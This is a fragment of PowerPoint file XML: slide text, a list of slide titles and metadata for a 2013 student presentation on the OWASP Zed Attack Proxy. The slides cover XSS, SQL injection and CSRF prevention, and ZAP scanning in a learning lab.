              <a:t>Fully documented</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Involvement actively encouraged</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Reuse well regarded components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229</TotalTime>
  <Words>1320</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>263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Clarity</vt:lpstr>
      <vt:lpstr>The OWASP  Zed Attack Proxy</vt:lpstr>
      <vt:lpstr>WARNING</vt:lpstr>
      <vt:lpstr>Overview </vt:lpstr>
      <vt:lpstr>introduction</vt:lpstr>
      <vt:lpstr>About OWASP</vt:lpstr>
      <vt:lpstr>Features of OWASP</vt:lpstr>
      <vt:lpstr>History of OWASP</vt:lpstr>
      <vt:lpstr>OWASP-Zed Attack Proxy</vt:lpstr>
      <vt:lpstr>ZAP Principles</vt:lpstr>
      <vt:lpstr>Features of ZAP</vt:lpstr>
      <vt:lpstr>OWASP Top 10 Application Security Risks</vt:lpstr>
      <vt:lpstr>Top 10 Application Security Risks </vt:lpstr>
      <vt:lpstr>XSS - Cross Site Scripting</vt:lpstr>
      <vt:lpstr>Types of XSS</vt:lpstr>
      <vt:lpstr>Prevention of XSS</vt:lpstr>
      <vt:lpstr>SQL Injection</vt:lpstr>
      <vt:lpstr>Types of SQL Injections</vt:lpstr>
      <vt:lpstr>Prevention of SQL Injection</vt:lpstr>
      <vt:lpstr>Cross Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Prevention Measures That Do NOT Work</vt:lpstr>
      <vt:lpstr>Prevention of CSRF</vt:lpstr>
      <vt:lpstr>Setting up the Environment</vt:lpstr>
      <vt:lpstr>Installation and Configuration of ZAP</vt:lpstr>
      <vt:lpstr>Setting Up Web Security Learning Lab</vt:lpstr>
      <vt:lpstr>Functioning of ZAP</vt:lpstr>
      <vt:lpstr>Functioning of ZAP </vt:lpstr>
      <vt:lpstr>Intercepting the traffic</vt:lpstr>
      <vt:lpstr>Spidering</vt:lpstr>
      <vt:lpstr>Scanning the website</vt:lpstr>
      <vt:lpstr>Scanning the website</vt:lpstr>
      <vt:lpstr>Analysis and Reporting</vt:lpstr>
      <vt:lpstr>Other ZAP features</vt:lpstr>
      <vt:lpstr>conclusion</vt:lpstr>
      <vt:lpstr>ZAP- Firefox of Web Security</vt:lpstr>
      <vt:lpstr>Future of ZAP</vt:lpstr>
      <vt:lpstr>References</vt:lpstr>
      <vt:lpstr>References (contd.)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OWASP  Zed Attack Proxy</dc:title>
  <dc:creator>Aditya</dc:creator>
  <cp:lastModifiedBy>Aditya</cp:lastModifiedBy>
  <cp:revision>24</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-05-06T09:22:36Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-05-06T13:12:30Z</dcterms:modified>
</cp:coreProperties>
</file>